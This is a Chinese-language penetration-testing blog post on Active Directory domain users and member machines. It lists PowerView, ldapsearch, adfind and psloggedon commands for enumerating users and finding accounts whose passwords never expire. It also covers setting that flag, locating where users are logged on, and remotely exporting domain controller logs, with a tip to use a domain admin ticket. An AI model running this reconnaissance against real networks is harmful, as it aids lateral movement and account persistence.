<!DOCTYPE html>
<html lang="zh-CN" data-theme="dark">
    <head prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#">
    <meta charset="UTF-8" />

    <meta name="generator" content="Hugo 0.88.1" /><meta name="theme-color" content="#16171d" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    
    <meta name="format-detection" content="telephone=no, date=no, address=no, email=no" />
    
    <meta http-equiv="Cache-Control" content="no-transform" />
    
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <title>域用户与域成员机器关系及利用 | MYZXCG</title>

    <link rel="stylesheet" href="/css/meme.min.ee7d92038178eda958210f69458541e2686ada11055b93762d6d324f2acc47c5.css"/>

    
    
        <script src="/js/meme.min.4194bf2034241e3757fbbbf5fe4db43d0ff17c81f4496e6bc931504f0978cbd2.js"></script>

    

    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />

        <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=EB&#43;Garamond:ital,wght@0,400;0,500;0,700;1,400;1,700&amp;family=Noto&#43;Serif&#43;SC:wght@400;500;700&amp;family=Source&#43;Code&#43;Pro:ital,wght@0,400;0,700;1,400;1,700&amp;display=swap" media="print" onload="this.media='all'" />
        <noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=EB&#43;Garamond:ital,wght@0,400;0,500;0,700;1,400;1,700&amp;family=Noto&#43;Serif&#43;SC:wght@400;500;700&amp;family=Source&#43;Code&#43;Pro:ital,wght@0,400;0,700;1,400;1,700&amp;display=swap" /></noscript>

    <meta name="author" content="myzxcg" /><meta name="description" content="域用户 基础信息 枚举域内用户 通过SAMR协议查询 samr也不算是一种专门的协议，就是一……" />

    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg" color="" />
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-title" content="MYZXCG" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    <meta name="mobile-web-app-capable" content="yes" />
    <meta name="application-name" content="MYZXCG" />
    <meta name="msapplication-starturl" content="../../../" />
    <meta name="msapplication-TileColor" content="#603cba" />
    <meta name="msapplication-TileImage" content="../../../icons/mstile-150x150.png" />
    <link rel="manifest" href="/manifest.json" />


    
    

    
    <link rel="canonical" href="https://myzxcg.com/2021/08/%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%8E%E5%9F%9F%E6%88%90%E5%91%98%E6%9C%BA%E5%99%A8%E5%85%B3%E7%B3%BB%E5%8F%8A%E5%88%A9%E7%94%A8/" />
    

<script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "datePublished": "2021-08-30T00:01:45+08:00",
        "dateModified": "2021-11-20T14:30:48+08:00",
        "url": "https://myzxcg.com/2021/08/%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%8E%E5%9F%9F%E6%88%90%E5%91%98%E6%9C%BA%E5%99%A8%E5%85%B3%E7%B3%BB%E5%8F%8A%E5%88%A9%E7%94%A8/",
        "headline": "域用户与域成员机器关系及利用",
        "description": "域用户 基础信息 枚举域内用户 通过SAMR协议查询 samr也不算是一种专门的协议，就是一……",
        "inLanguage" : "zh-CN",
        "articleSection": "posts",
        "wordCount":  3914 ,
        "image": ["https://myzxcg.com/images/image-20210828215100587.png","https://myzxcg.com/images/image-20210828215654037.png","https://myzxcg.com/images/image-20210828215728754.png","https://myzxcg.com/images/image-20210828215755592.png","https://myzxcg.com/images/image-20210828220028051.png"],
        "author": {
            "@type": "Person",
            "description": "专注于Web安全、内网渗透. 记录学习与渗透过程中遇到的有意思的点, 分享技巧与知识. 欢迎交流～",
            "email": "myzx.xcg@gmail.com",
            "image": "https://myzxcg.com/avatar.png",
            "url": "https://myzxcg.com/",
            "name": "myzxcg"
        },
        "license": "[CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh)",
        "publisher": {
            "@type": "Organization",
            "name": "MYZXCG",
            "logo": {
                "@type": "ImageObject",
                "url": "https://myzxcg.com/icons/favicon.ico"
            },
            "url": "https://myzxcg.com/"
        },
        "mainEntityOfPage": {
            "@type": "WebSite",
            "@id": "https://myzxcg.com/"
        }
    }
</script>

    

<meta name="twitter:card" content="summary_large_image" />


<meta name="twitter:site" content="@myzxcg" />
<meta name="twitter:creator" content="@myzxcg" />

    



<meta property="og:title" content="域用户与域成员机器关系及利用" />
<meta property="og:description" content="域用户 基础信息 枚举域内用户 通过SAMR协议查询 samr也不算是一种专门的协议，就是一……" />
<meta property="og:url" content="https://myzxcg.com/2021/08/%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%8E%E5%9F%9F%E6%88%90%E5%91%98%E6%9C%BA%E5%99%A8%E5%85%B3%E7%B3%BB%E5%8F%8A%E5%88%A9%E7%94%A8/" />
<meta property="og:site_name" content="MYZXCG" />
<meta property="og:locale" content="zh" /><meta property="og:image" content="https://myzxcg.com/images/image-20210828215100587.png" />
<meta property="og:type" content="article" />
    <meta property="article:published_time" content="2021-08-30T00:01:45&#43;08:00" />
    <meta property="article:modified_time" content="2021-11-20T14:30:48&#43;08:00" />
    
    <meta property="article:section" content="posts" />


        <link rel="preconnect" href="https://www.google-analytics.com" crossorigin />

        


    
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-Y0LZRMN44V"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'G-Y0LZRMN44V');
    </script>




    
    

    
</head>

    <body>
        <div class="container">
            
    <header class="header">
        
            <div class="header-wrapper">
                <div class="header-inner single">
                    
    <div class="site-brand">
        
            <a href="/" class="brand">MYZXCG</a>
        
    </div>

                    <nav class="nav">
    <ul class="menu" id="menu">
        
            
        
        
        
        
            
                <li class="menu-item"><a href="/archives/"><span class="menu-item-name">文章</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/tags/"><span class="menu-item-name">标签</span></a>
                </li>
            
        
            
                <li class="menu-item"><a href="/about/"><span class="menu-item-name">关于</span></a>
                </li>
            
        
            
                
                    
                    
                
            
        
            
                
            
        
    </ul>
</nav>

                    
                </div>
            </div>
            
    <input type="checkbox" id="nav-toggle" aria-hidden="true" />
    <label for="nav-toggle" class="nav-toggle"></label>
    <label for="nav-toggle" class="nav-curtain"></label>


        
    </header>




            
            
    <main class="main single" id="main">
    <div class="main-inner">

        

        <article class="content post h-entry" data-align="justify" data-type="posts" data-toc-num="true">

            <h1 class="post-title p-name">域用户与域成员机器关系及利用</h1>

            

            
                
            

            
                

<div class="post-meta">
    
        
        <time datetime="2021-08-30T00:01:45&#43;08:00" class="post-meta-item published dt-published"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon post-meta-icon"><path d="M400 64h-48V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H160V12c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v52H48C21.49 64 0 85.49 0 112v352c0 26.51 21.49 48 48 48h352c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm-6 400H54a6 6 0 0 1-6-6V160h352v298a6 6 0 0 1-6 6zm-52.849-200.65L198.842 404.519c-4.705 4.667-12.303 4.637-16.971-.068l-75.091-75.699c-4.667-4.705-4.637-12.303.068-16.971l22.719-22.536c4.705-4.667 12.303-4.637 16.97.069l44.104 44.461 111.072-110.181c4.705-4.667 12.303-4.637 16.971.068l22.536 22.718c4.667 4.705 4.636 12.303-.069 16.97z"/></svg>&nbsp;2021.8.30</time>
    
    
    
    
        
        
        
            
        
    
    
    
        
        <span class="post-meta-item reading-time"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon post-meta-icon"><path d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm61.8-104.4l-84.9-61.7c-3.1-2.3-4.9-5.9-4.9-9.7V116c0-6.6 5.4-12 12-12h32c6.6 0 12 5.4 12 12v141.7l66.8 48.6c5.4 3.9 6.5 11.4 2.6 16.8L334.6 349c-3.9 5.3-11.4 6.5-16.8 2.6z"/></svg>&nbsp;8&nbsp;分钟</span>
    

   
    

    
    
</div>

            

            <nav class="contents">
  <h2 id="contents" class="contents-title">目录</h2><ol class="toc">
    <li><a id="contents:域用户" href="#域用户">域用户</a>
      <ol>
        <li><a id="contents:基础信息" href="#基础信息">基础信息</a></li>
        <li><a id="contents:域用户密码永不过期属性" href="#域用户密码永不过期属性">域用户密码永不过期属性</a></li>
      </ol>
    </li>
    <li><a id="contents:查询域用户能登陆的机器" href="#查询域用户能登陆的机器">查询域用户能登陆的机器</a></li>
    <li><a id="contents:机器账户" href="#机器账户">机器账户</a>
      <ol>
        <li><a id="contents:域用户添加机器用户" href="#域用户添加机器用户">域用户添加机器用户</a></li>
        <li><a id="contents:机器用户添加域用户" href="#机器用户添加域用户">机器用户添加域用户</a></li>
      </ol>
    </li>
    <li><a id="contents:参考" href="#参考">参考</a></li>
  </ol>
</nav><div class="post-body e-content">
                <h2 id="域用户"><a href="#域用户" class="anchor-link">#</a><a href="#contents:域用户" class="headings">域用户</a></h2>
<h3 id="基础信息"><a href="#基础信息" class="anchor-link">#</a><a href="#contents:基础信息" class="headings">基础信息</a></h3>
<ul>
<li>
<p><strong>枚举域内用户</strong></p>
<ol>
<li>
<p>通过SAMR协议查询
samr也不算是一种专门的协议，就是一个RPC接口。常用的<code>net user /domain</code>就是使用samr进行查询的。impacket也有一个脚本<a href="http://xn--samrdump-z09lrnlty18ucnay111aul8bzxs.py" target="_blank" rel="noopener">samrdump.py</a>专门调用samr去查询域用户。
<img src="/images/image-20210828215100587.png" alt=""></p>
</li>
<li>
<p>通过LDAP查询
域用户存储于活动目录数据库里面，对其他用户可见。所以可以通过LDAP查询。</p>
<p>查询域内所有用户</p>
<p><code>adfind -s subtree -b dc=rootkit,dc=org -f &quot;(&amp;(objectCategory=person)(objectClass=user))&quot; -dn</code></p>
</li>
</ol>
</li>
<li>
<p><strong>登录格式</strong></p>
<ol>
<li>第一种是<code>UserPrincipalName</code>（简称UPN），一般的格式是用户名@域名这样的格式。如<code>lisi@test.local</code></li>
<li>第二种是<code>域名\SAMAccountName</code>这种格式。这里的域名可以是netbios名或dns名。如<code>test.local\lisi</code></li>
</ol>
</li>
</ul>
<h3 id="域用户密码永不过期属性"><a href="#域用户密码永不过期属性" class="anchor-link">#</a><a href="#contents:域用户密码永不过期属性" class="headings">域用户密码永不过期属性</a></h3>
<p>为了增强安全性，域组策略会设置所有域用户口令的最长有效时间，到达过期时间后强制用户更改口令。
域用户的密码永不过期属性保存在域用户的userAccountControl属性中。将该属性值514再加上<code>65536</code>，即设置为<code>66048</code>代表密码不过期。</p>
<ol>
<li>
<p>查询域内密码不过期用户</p>
<p><a href="https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll" target="_blank" rel="noopener">ActiveDirectory</a></p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#Powershell ActiveDirectory模块</span>
<span class="nb">Import-Module</span> <span class="n">ActiveDirectory</span>
<span class="nb">Search-ADAccount</span> <span class="n">-PasswordNeverExpires</span> <span class="p">|</span> <span class="nb">FT </span><span class="n">UserPrincipalName</span>

<span class="c">#PowerView</span>
<span class="c">#筛选出符合条件的所有用户</span>
<span class="nb">import-module</span> <span class="p">.\</span><span class="n">PowerView</span><span class="p">.</span><span class="n">ps1</span>
<span class="k">ForEach</span><span class="p">(</span><span class="nv">$User</span> <span class="k">in</span> <span class="p">(</span><span class="nb">Get-NetUser</span><span class="p">))</span>
<span class="p">{</span>
	<span class="k">if</span><span class="p">((</span><span class="nv">$User</span><span class="p">.</span><span class="n">useraccountcontrol</span> <span class="o">-band</span> <span class="n">65536</span><span class="p">)</span> <span class="o">-eq</span> <span class="n">65536</span><span class="p">)</span>
	<span class="p">{</span>
     <span class="nb">Write-Output</span> <span class="nv">$User</span><span class="p">.</span><span class="n">samaccountname</span>
	<span class="p">}</span>		
<span class="p">}</span>
<span class="c">#查询指定用户属性</span>
<span class="nb">import-module</span> <span class="p">.\</span><span class="n">PowerView</span><span class="p">.</span><span class="n">ps1</span>
<span class="nb">Get-NetUser</span> <span class="n">test1</span><span class="p">|</span> <span class="nb">select </span><span class="n">useraccountcontrol</span> <span class="p">|</span> <span class="nb">ConvertFrom-UACValue</span>

<span class="c">#ldapsearch</span>
<span class="c">#获取userAccountControl属性值后再同65536做按位与运算，如果结果为65536，那么代表具有密码永不过期的属性。</span>
<span class="n">ldapsearch</span> <span class="n">-x</span> <span class="n">-H</span> <span class="n">ldap</span><span class="err">:</span><span class="p">//</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="err">:</span><span class="n">389</span> <span class="n">-D</span> <span class="s2">&#34;CN=testa,CN=Users,DC=test,DC=com&#34;</span> <span class="n">-w</span> <span class="n">DomainPassword123</span><span class="p">!</span> <span class="n">-b</span> <span class="s2">&#34;DC=test,DC=com&#34;</span> <span class="s2">&#34;(&amp;(objectClass=user)(objectCategory=person))&#34;</span> <span class="n">grep</span> <span class="n">userAccountControl</span>

<span class="c">#CSharp实现 https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/List_passwordneverexpires_user_byLDAP.cs</span>
<span class="c">#如果使用当前用户的凭据，需要将代码:</span>
<span class="n">DirectoryEntry</span> <span class="n">de</span> <span class="p">=</span> <span class="n">new</span> <span class="n">DirectoryEntry</span><span class="p">(</span><span class="s2">&#34;LDAP://&#34;</span> <span class="p">+</span> <span class="n">args</span><span class="p">[</span><span class="n">0</span><span class="p">],</span><span class="n">args</span><span class="p">[</span><span class="n">1</span><span class="p">],</span><span class="n">args</span><span class="p">[</span><span class="n">2</span><span class="p">]);</span><span class="n">替换为</span>
<span class="n">DirectoryEntry</span> <span class="n">de</span> <span class="p">=</span> <span class="n">new</span> <span class="n">DirectoryEntry</span><span class="p">(</span><span class="s2">&#34;LDAP://&#34;</span> <span class="p">+</span> <span class="n">args</span><span class="p">[</span><span class="n">0</span><span class="p">]);</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>从域外进行枚举的方法</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#Powershell ActiveDirectory模块</span>
<span class="nb">import-module</span> <span class="p">.\</span><span class="n">Microsoft</span><span class="p">.</span><span class="n">ActiveDirectory</span><span class="p">.</span><span class="n">Management</span><span class="p">.</span><span class="n">dll</span>
<span class="nv">$uname</span><span class="p">=</span><span class="s2">&#34;test1&#34;</span>
<span class="nv">$pwd</span><span class="p">=</span><span class="nb">ConvertTo-SecureString</span> <span class="s2">&#34;DomainPassword123!&#34;</span> <span class="n">-AsPlainText</span> <span class="err">–</span><span class="n">Force</span>
<span class="nv">$cred</span><span class="p">=</span><span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">Management</span><span class="p">.</span><span class="n">Automation</span><span class="p">.</span><span class="n">PSCredential</span><span class="p">(</span><span class="nv">$uname</span><span class="p">,</span><span class="nv">$pwd</span><span class="p">)</span>
<span class="nb">Search-ADAccount</span> <span class="n">-Server</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span> <span class="n">-Credential</span> <span class="nv">$cred</span> <span class="n">-Verbose</span> <span class="n">-PasswordNeverExpires</span> <span class="p">|</span> <span class="nb">FT </span><span class="n">Name</span>

<span class="c">#PowerView</span>
<span class="nb">import-module</span> <span class="p">.\</span><span class="n">PowerView</span><span class="p">.</span><span class="n">ps1</span>
<span class="nv">$uname</span><span class="p">=</span><span class="s2">&#34;test1&#34;</span>
<span class="nv">$pwd</span><span class="p">=</span><span class="nb">ConvertTo-SecureString</span> <span class="s2">&#34;DomainPassword123!&#34;</span> <span class="n">-AsPlainText</span> <span class="err">–</span><span class="n">Force</span>
<span class="nv">$cred</span><span class="p">=</span><span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">Management</span><span class="p">.</span><span class="n">Automation</span><span class="p">.</span><span class="n">PSCredential</span><span class="p">(</span><span class="nv">$uname</span><span class="p">,</span><span class="nv">$pwd</span><span class="p">)</span>
<span class="nv">$Users</span><span class="p">=</span><span class="nb">Get-NetUser</span> <span class="n">-Domain</span> <span class="s2">&#34;test.com&#34;</span> <span class="n">-DomainController</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span> <span class="n">-Credential</span> <span class="nv">$cred</span>
<span class="k">ForEach</span><span class="p">(</span><span class="nv">$User</span> <span class="k">in</span> <span class="nv">$Users</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span><span class="p">((</span><span class="nv">$User</span><span class="p">.</span><span class="n">useraccountcontrol</span> <span class="o">-band</span> <span class="n">65536</span><span class="p">)</span> <span class="o">-eq</span> <span class="n">65536</span><span class="p">)</span>
	<span class="p">{</span>
     <span class="nb">Write-Output</span> <span class="nv">$User</span><span class="p">.</span><span class="n">samaccountname</span>
	<span class="p">}</span>		
<span class="p">}</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>向指定用户添加密码永不过期属性</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#使用dsmod命令</span>
<span class="n">dsmod</span> <span class="n">user</span> <span class="s2">&#34;CN=testc,CN=Users,DC=test,DC=com&#34;</span> <span class="n">-pwdneverexpires</span> <span class="n">yes</span>
<span class="c">#Powershell ActiveDirectory模块</span>
<span class="nb">Set-ADUser</span> <span class="n">-Identity</span> <span class="n">testc</span> <span class="n">-PasswordNeverExpires</span> <span class="nv">$true</span>
<span class="c">#PowerView</span>
<span class="nb">Set-ADObject</span> <span class="n">-SamAccountName</span> <span class="n">testc</span> <span class="n">-PropertyName</span> <span class="n">useraccountcontrol</span> <span class="n">-PropertyXorValue</span> <span class="n">65536</span>
<span class="c">#CSharp实现</span>
<span class="c">#https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/Add_passwordneverexpires_user_byLDAP.cs</span>
</code></pre></td></tr></table></div>
</div>
</div></li>
<li>
<p>userAccountControl属性值同65536作按位异或运算(运算符^) 或者属性值直接减去65536。</p>
</li>
</ol>
<h2 id="查询域用户能登陆的机器"><a href="#查询域用户能登陆的机器" class="anchor-link">#</a><a href="#contents:查询域用户能登陆的机器" class="headings">查询域用户能登陆的机器</a></h2>
<p>默认情况下，域用户能够登录任何一台域成员机器。因为在域成员机器的本地安全策略中默认允许Users组本地登录。Users组包括Domain Users。而域内用户默认都在Domain Users组里面。所以域内成员默认都能登录域内任何一台机器。</p>
<p>如果要对用户登录机器做限制，一般会有两种修改方案:</p>
<ol>
<li>在域用户这边做限制，设置域用户只允许登录到某台机器。</li>
<li>下发组策略，在域内机器这边做限制。把常登陆这台机器的域用户加入到本地的Administrators组里。并把User组从本地登录里面删除。这样因为在Administrators组里面的用户可以登录，其他域用户就不能登录。</li>
</ol>
<hr>
<p><strong>根据以上两种方案，给出查询域成员和域成员机器对应关系的方法:</strong></p>
<ol>
<li>
<p>在限制了域用户只能登录到某台主机后，会设置对应域用户的<code>userWorkstations</code>属性。这个属性保存了该域用户能登录到哪台机器。且这个字段对于域内任何用户都是可读的。</p>
<p><code>adfind -sc u:micle userWorkstations</code></p>
</li>
<li>
<p>如果通过组策略实现的，可以通过组策略查询域内所有机器的本地管理员组用户。</p>
<p>可利用PowerView的<code>Invoke-EnumerateLocalAdmin</code>实现。或使用<a href="https://www.joeware.net/freetools/tools/lg/index.htm" target="_blank" rel="noopener">LG</a>查询域内机器本地组用户。</p>
<p><code>LG.exe \\192.168.1.75\administrators</code> (枚举<code>192.168.1.75</code>机器本地administrators组内用户)</p>
</li>
<li>
<p><strong>查询域内用户正在登陆的主机</strong></p>
<p>寻找一个域用户正在登陆的主机，主要有以下几种方式（原理解释）</p>
<ol>
<li>
<p>查询远程机器注册表项里HKEY_USERS，来查看谁正在登陆该机器。</p>
<p>远程登录SERVER12的注册表，看到HKEY_USERS底下的key有<code>S-1-5-21-1909611416-240434215-3714836602-1113</code>，将这个sid转化为用户名是<code>TEST\maria</code>，说明<code>TEST\maria</code>登录在SERVER12这台机器上。</p>
<ul>
<li>PC机器默认是没有开启注册表远程连接的（RemoteRegistry服务）。Server机器默认开启远程连接。</li>
<li>域内用户即使配置了不能本地登录域内机器A，但是只要机器A开启远程注册表连接，就可以连接上机器A的注册表，从而枚举正在登陆的用户。</li>
</ul>
</li>
<li>
<p>利用<code>NetSessionEnum</code>（win32 API）来寻找登陆的网络会话，<strong>一般用来查域控</strong>。</p>
<ul>
<li>可以查询那些用户访问机器A的网络资源（如文件共享）时所创建的网络会话。</li>
<li>调用此函数的用户，并不需要在机器A上有管理员权限。域内任何用户都可以调用此函数。</li>
</ul>
</li>
<li>
<p>利用<code>NetWkstaUserEnum</code>（win32 API）列出当前登录到该机器的所有用户</p>
<p>这个API会去调用远程机器A的RPC。然后返回当前登录到机器A的所有用户的信息，但调用该函数的用户需要具备机器A的本地管理员权限。</p>
</li>
</ol>
<p><strong>Tips：</strong> 如果不开启Computer Browser服务，<code>psloggedon</code>查询域用户会报错，并且<code>NetView -d</code>不会有数据。（开启SMB 1.0才有这个服务，而Windows 10(1803)和2019默认禁用SMB1.0，<a href="https://docs.microsoft.com/zh-cn/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3" target="_blank" rel="noopener">开启SMB1.0</a>后需要重启才能生效）</p>
<p>启动Computer Browser服务命令: <code>sc config Browser start= auto &amp;&amp;sc start Browser</code></p>
<ul>
<li>
<p>Psloggedon</p>
<p>Sysinternals Suite套件工具，缺点：无法批量查询。</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#工作组环境也可以用，只是需要权限</span>
<span class="c">#查询远程机器注册表项和NetSessionEnum的方式查询目标机器上用户登陆情况。</span>
<span class="n">psloggedon</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">accepteula</span> <span class="p">\\</span><span class="n">ip</span>
<span class="c">#查询域内用户在哪些机器上登陆 </span>
<span class="n">psloggedon</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">accepteula</span> <span class="n">administrator</span>
</code></pre></td></tr></table></div>
</div>
</div><p><img src="/images/image-20210828215654037.png" alt=""></p>
</li>
<li>
<p><a href="https://github.com/mubix/netview" target="_blank" rel="noopener">NetView</a></p>
<p>查询机器的共享文件，登陆的用户和网络Session。</p>
<p><strong>Tips：</strong> 上面介绍的三种方式都会用。</p>
<ol>
<li>只要有目标机器本地管理员权限，哪怕没开远程注册表也能查本地登陆的用户。建议用域管票据PTT后执行，这样全能查。</li>
<li>如果目标没有Computer Browser服务，那么可以指定-f去查，如果用PTT话，文件内容必须是主机名，不能是IP，这样才能查出目标本地登陆的用户。</li>
</ol>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#只能通过文件指定IP或者机器名（普通域用户权限查不到其他机器正在登录的域用户）</span>
<span class="n">netview</span><span class="p">.</span><span class="n">exe</span> <span class="o">-f</span> <span class="n">target</span><span class="p">.</span><span class="n">txt</span> 
<span class="c">#查询指定域名 </span>
<span class="n">netview</span><span class="p">.</span><span class="n">exe</span> <span class="n">-d</span> <span class="n">rootkit</span><span class="p">.</span><span class="n">org</span>  
<span class="c">#查询当前域</span>
<span class="n">netview</span><span class="p">.</span><span class="n">exe</span> <span class="n">-d</span> 
</code></pre></td></tr></table></div>
</div>
</div><p><img src="/images/image-20210828215728754.png" alt=""></p>
</li>
<li>
<p><a href="https://github.com/chrisdee/Tools/blob/master/AD/ADFindUsersLoggedOn/PVEFindADUser.exe" target="_blank" rel="noopener">PVEFindADUser</a></p>
<p>域内用（<a href="http://xn--xsqs81m.Net" target="_blank" rel="noopener">依赖.Net</a> Framework 2.0环境），不受Computer Browser服务影响</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c">#查询域内所有机器登陆的用户（用的是psloggedon一样的方式）</span>
<span class="n">PVEFindADUser</span><span class="p">.</span><span class="n">exe</span> <span class="n">-current</span> <span class="n">-noping</span>
<span class="c">#查询指定机器</span>
<span class="n">PVEFindADUser</span><span class="p">.</span><span class="n">exe</span> <span class="n">-current</span> <span class="n">-target</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">10</span>
<span class="c">#查询指定域用户登陆情况(需要指定域名)</span>
<span class="n">PVEFindADUser</span><span class="p">.</span><span class="n">exe</span> <span class="n">-current</span> <span class="n">0day</span><span class="p">\</span><span class="n">administrator</span>
</code></pre></td></tr></table></div>
</div>
</div><p><img src="/images/image-20210828215755592.png" alt=""></p>
</li>
<li>
<p>其他工具</p>
<ul>
<li><a href="http://www.joeware.net/freetools/tools/netsess/" target="_blank" rel="noopener">Netsess</a>只能查询指定机器的Session登录用户 (仅调用NetSessionEnum API)</li>
<li>nmap的smb-enum-sessions.nse，获取域内主机的用户登录会话，查看当前是否有用户登陆。</li>
<li>Invoke-UserHunter不好用。</li>
</ul>
</li>
</ul>
</li>
<li>
<p><strong>导出域控日志进行分析</strong></p>
<p><strong>Tips：</strong> 在域内可能存在多台域控，日志并不同步，所以需要把每一台域控的日志都导出来。</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="c1">#远程查询</span>
<span class="n">wevtutil</span> <span class="n">qe</span> <span class="n">security</span> <span class="o">/</span><span class="n">rd</span><span class="p">:</span><span class="n">true</span> <span class="o">/</span><span class="n">f</span><span class="p">:</span><span class="n">text</span> <span class="o">/</span><span class="n">q</span><span class="p">:</span><span class="s2">&#34;*[system/eventid=4624 and 4623 and 4672]&#34;</span> <span class="o">/</span><span class="n">r</span><span class="p">:</span><span class="n">dc1</span> <span class="o">/</span><span class="n">u</span><span class="p">:</span><span class="n">administrator</span> <span class="o">/</span><span class="n">p</span><span class="p">:</span><span class="n">password</span>
<span class="c1">#域内用户A在机器B正常登录,登录成功的话，在域控那边，会有个4624的日志，登录类型为3。</span>
